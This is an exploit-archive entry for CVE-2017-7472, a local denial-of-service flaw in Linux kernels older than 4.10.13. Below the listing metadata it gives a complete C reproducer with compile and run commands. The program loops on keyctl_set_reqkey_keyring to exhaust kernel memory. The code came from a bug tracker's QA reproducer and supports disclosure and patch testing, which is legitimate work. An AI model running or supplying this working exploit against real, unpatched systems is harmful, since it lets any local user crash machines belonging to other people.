EXPLOITS

Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service

Author: Marcus Meissner
type: dos
platform: linux
port: 
date_added: 2017-06-07  
date_updated: 2017-06-07  
verified: 1  
codes: CVE-2017-7472  
tags: Denial of Service (DoS)  
aliases:   
screenshot_url:   
application_url:   

raw file: 42136.c  

/*
Source: https://bugzilla.novell.com/show_bug.cgi?id=1034862
QA REPRODUCER:

gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils
./CVE-2017-7472

(will run the kernel out of memory)
*/
#include <sys/types.h>
#include <keyutils.h>

int main()
{
	for (;;)
		keyctl_set_reqkey_keyring(KEY_REQKEY_DEFL_THREAD_KEYRING);
}